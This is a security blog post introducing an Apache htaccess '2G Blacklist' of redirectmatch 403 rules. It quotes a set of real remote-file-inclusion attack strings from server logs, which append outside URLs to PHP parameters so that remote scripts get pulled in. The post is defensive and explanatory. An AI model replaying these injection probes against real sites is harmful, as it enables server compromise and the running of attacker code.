Since posting the Ultimate htaccess Blacklist and then the Ultimate htaccess Blacklist 2, I find myself dealing with a new breed of malicious attacks. It is no longer useful to simply block nefarious user agents because they are frequently faked. Likewise, blocking individual IP addresses is generally a waste of time because the attacks are coming from a decentralized network of zombie machines. Watching my error and access logs very closely, I have observed the following trends in current attacks:
- User agents are faked, typically using something generic like “
- Each attack may involve hundreds of compromised IP addresses
- Attacks generally target a large number of indexed (i.e., known) pages, posts, etc.
- Frequently, attacks utilize query strings appended to variously named PHP files
- The target URLs often include a secondary URL appended to the end of a permalink
- An increasing number of attacks employ random character strings to probe for holes
Yet despite the apparent complexity of such attacks, they tend to look remarkably similar. Specifically, notice the trends in the following examples of (nonexistent) target URLs, or “attack strings,” as I like to call them:
http://perishablepress.com/press/tag/tutorial/menu.php?http://www.lexiaintl.org/templates/css/test.txt? http://perishablepress.com/press/2008/01/13/like-spider-pig/home.php?p=http://www.rootsfestival.no/.s/n? http://perishablepress.com/press/wp-content/images/2006/feed-collection/feed-icon_orange-28px.png%20alt= http://perishablepress.com/press/2007/08/29/stop-wordpress-from-leaking-pagerank-to-admin-pages/admin/doeditconfig.php http://perishablepress.com/press/2007/07/29/slideshow-code-for-dead-letter-art/http://cccryuan1918ssdf.nightmail.ru/babyboy/? http://perishablepress.com/press/tag/upgrade/includes/db_connect.php?baseDir=http://www.stempel-immobilien.de/images/mambo?? http://perishablepress.com/press/2007/12/17/how-to-enable-php-error-logging-via-htaccess/indexhttp://hellinsoloradio.com/test.txt? http://perishablepress.com/press/tag/php/components/com_webring/admin.webring.docs.php?component_dir=http://www.cartographia.org/ftp/files/source/SinG?? http://perishablepress.com/press/2007/11/14/easily-adaptable-wordpress-loop-templates/home.php?menu=http://www.zojoma.com/gjestebok/img/response?%0D? http://perishablepress.com/press/2007/10/15/ultimate-htaccess-blacklist-2-compressed-version/1x2n6l6bx6nt//001mAFC(-~l-xAou6.oCqAjB4ukkmrntoz1A//0011C/uikqijg4InjxGu.k http://perishablepress.com/press/2006/06/14/the-htaccess-rules-for-all-wordpress-permalinks//wordpress/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.mecad.es/bo?? http://perishablepress.com/press/2007/10/15/ultimate-htaccess-blacklist-2-compressed-version/x%7b.//000Ooz,m4//000____::um,qymuxH%3bmJ.5G+D//001F00Dox%7b1rF9DrEtxmn7unwp%7dqDr/ http://perishablepress.com/press/2007/07/17/wp-shortstat-slowing-down-root-index-pages/members/plugins/payment/secpay/config.inc.php?config%5brhttp://www.algebramovie.com/images/test.txt???
Now imagine hundreds or even thousands of requests for each of these different URL variations, each targeting a different preexisting resource. So, for example, using the first attack string from our list, such an attack would generate the following log entries:
http://example.com/2007/01/29/fun-with-the-dos-command-prompt/menu.php?http://www.lexiaintl.org/templates/css/test.txt? http://example.com/2006/11/01/addmysite-plugin-for-wordpress/menu.php?http://www.lexiaintl.org/templates/css/test.txt? http://example.com/2006/11/20/add-rss-feed-link-icons/menu.php?http://www.lexiaintl.org/templates/css/test.txt? http://example.com/2006/01/10/stupid-htaccess-tricks/menu.php?http://www.lexiaintl.org/templates/css/test.txt? http://example.com/tag/tutorial/menu.php?http://www.lexiaintl.org/templates/css/test.txt? . . . [ + many more ]
Then, associated with each of these attacks is a unique (or semi-unique) IP address and (faked) user agent. Occasionally, such attacks will be executed from a single machine or even small network, in which case the user agent for each entry is generally generically randomized to avoid user-agent-based blacklists. More typically, however, the current state of spammer and cracker attacks employs a virtually “unblockable” array of user agents and IP addresses. In short, recent blacklisting methods relying on either of these variables are becoming increasingly less effective at stopping malicious attacks.
A Second Generation Blacklist
Given these observations, I have adopted a new strategy for dealing with this “new breed” of malicious attacks. Instead of targeting zillions of IP addresses and/or user agents for blacklisting, I am now identifying recurring attack string patterns and subsequently blocking them via the
redirectmatch directive of Apache’s powerful
redirectmatch 403 attackstring1
redirectmatch 403 attackstring2
redirectmatch 403 attackstring3
By blocking key portions of the actual strings used in an attack, we are targeting an “unfakable” variable and preventing its use in any capacity. For example, referring to our previously given collection of attack strings, we are able block almost the entire collection with a single line of code:
redirectmatch 403 http\:\/\/
Within the context of current server-exploitation techniques, that one line of code is an immensely powerful weapon for closing the door on malicious attacks. By focusing our blacklisting efforts directly on the attack vector itself, we employ a strategy that transcends the emergent complexity and variation inherent among intrinsic attack parameters. They can fake the user agents, the IP addresses, and just about everything else, but they can’t fake the (potential) targets of their attacks. Attack strings contain patterns that remain far more constant than previously targeted variables. And it gets even better..
Presenting the 2G Blacklist
For several months now, I have been harvesting key portions of malicious attack strings from my access logs and adding them to my new and improved “2G” blacklist. After the addition of each new string, I take as much time as possible to test the effectiveness of the block and ensure that it doesn’t interfere with normal functionality. Although highly effective in its current state, the 2G Blacklist is a work in progress. As time goes on, this blacklisting method will certainly evolve to keep up with the rapidly changing arsenal of spammer and cracker attacks. To stay current with this and many other security measures, I encourage you to subscribe to Perishable Press. As mentioned, this blacklist is designed for Apache servers equipped with the
mod_alias module. You will need access to your site’s root htaccess file, into which you simply copy & paste the following code:
# 2G Blacklist from Perishable Press <IfModule mod_alias.c> redirectmatch 403 \.inc redirectmatch 403 alt\= redirectmatch 403 http\:\/\/ redirectmatch 403 menu\.php redirectmatch 403 main\.php redirectmatch 403 file\.php redirectmatch 403 home\.php redirectmatch 403 view\.php redirectmatch 403 about\.php redirectmatch 403 order\.php redirectmatch 403 index2\.php redirectmatch 403 errors\.php redirectmatch 403 config\.php redirectmatch 403 button\.php redirectmatch 403 middle\.php redirectmatch 403 threads\.php redirectmatch 403 contact\.php redirectmatch 403 display\.cgi redirectmatch 403 display\.php redirectmatch 403 include\.php redirectmatch 403 register\.php redirectmatch 403 db_connect\.php redirectmatch 403 doeditconfig\.php redirectmatch 403 send\_reminders\.php redirectmatch 403 admin_db_utilities\.php redirectmatch 403 admin\.webring\.docs\.php redirectmatch 403 keds\.lpti redirectmatch 403 r\.verees redirectmatch 403 pictureofmyself redirectmatch 403 remoteFile redirectmatch 403 mybabyboy redirectmatch 403 mariostar redirectmatch 403 zaperyan redirectmatch 403 babyboy redirectmatch 403 aboutme redirectmatch 403 xAou6 redirectmatch 403 qymux </IfModule>
A brief rundown of what we are doing here.. First, notice that the entire list is enclosed with an “
IfModule” test container; this ensures that your site will not crash if for some reason
mod_alias becomes unavailable. The list itself is elegantly simple. Each line targets a specific string of characters that, if matched in the URL, will return a server status
403 — forbidden — HTTP error code. Nice, clean, and easy.
Although highly effective at stopping many attacks, this blacklist is merely another useful tool in the ongoing hellish battle against the evil forces of the nefarious online underworld. It is meant to complement existing methods, not replace them. Is there still benefit from blocking certain ranges of IPs? Yes, subscribe to my friend Will Macc over at A Daily Rant to understand why. Is there still benefit from blocking certain user agents? Yes, many spammers, scrapers and crackers have yet to spoof this aspect of their game — there are many well-known and well-hated user agents that should be banned. Is there still benefit from blocking individual IP addresses? As discussed elsewhere at Perishable Press, yes, crackers and attackers have their favorite locations and certain zombie machines are easier to manipulate than others. It is in addition to these tools, then, that the 2G Blacklist serves as a solid defense against malicious attacks.